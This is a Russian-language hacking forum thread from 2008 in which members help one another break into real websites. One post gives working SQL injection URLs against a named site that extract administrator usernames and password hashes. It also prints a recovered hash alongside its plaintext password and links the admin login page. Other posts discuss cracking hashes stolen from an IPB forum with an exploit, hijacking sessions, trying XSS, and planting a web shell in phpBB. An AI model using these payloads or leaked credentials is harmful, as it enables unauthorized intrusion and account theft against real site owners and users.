 |
|
14.08.2008, 17:25
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от viv
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
1 Читать статьи
2 Убрать пробелы из урла
3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках
К посту ниже:
Выполни Все рекоммендации 
Последний раз редактировалось jokester; 14.08.2008 в 18:19..
Причина: Дополнил
|
|
|
14.08.2008, 17:31
|
|
Новичок
Регистрация: 14.08.2008
Сообщений: 3
С нами:
9337225
Репутация:
0
|
|
Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет
|
|
|
|
15.08.2008, 04:08
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Сообщение от viv
Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет
всё работает говорят же пробелы убери )
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table+where+id=1/*
digit:30bf4fb4729f382ca2010fd445f1796d: mityap123
http://www.hardvision.ru/admin/
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw),3+fr om+foto.users+limit+0,1/*
Последний раз редактировалось ~!DoK_tOR!~; 15.08.2008 в 04:13..
|
|
|
|
16.08.2008, 03:24
|
|
Новичок
Регистрация: 13.08.2008
Сообщений: 6
С нами:
9338708
Репутация:
0
|
|
Доброго времени суток.
У меня такая проблема на одном форуме IPB 2.1.6 с помощью эксплоита я нашел хеши, но куки требует ещё и сесион_айди, в экплоите он не может всё время говорит что-то типа зайдите попозже сейчас not exist. Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно. Если же толку нет расшифровывать то значит придется через xss пробовать чтоли? Но там с регистрацией проблемы стоит жесткий контроль на каждого регистрирующегося.
|
|
|
|
16.08.2008, 03:35
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Сообщение от sher_or_wer
Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно
https://forum.antichat.ru/thread76958.html
|
|
|
|
16.08.2008, 03:43
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
sher_or_wer, сессию можно достать только когда юзер, который тебе нужен в онлайне, если не ошибаюсь. А хэши можно расшифровать на milw0rm.com и hashcracking.info. Или можешь побрутить сам с помощью PasswordsPro.
|
|
|
|
16.08.2008, 19:51
|
|
Новичок
Регистрация: 13.08.2008
Сообщений: 6
С нами:
9338708
Репутация:
0
|
|
Спасибо за ответы ~!DoK_tOR!~ и n0ne
|
|
|
|
17.08.2008, 14:43
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно
|
|
|
|
17.08.2008, 19:24
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от Nea7
кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно
читай
_http://forum.antichat.ru/thread24488.html
|
|
|
|
17.08.2008, 19:40
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от DimOnOID
читай
_http://forum.antichat.ru/thread24488.html
прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт
смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
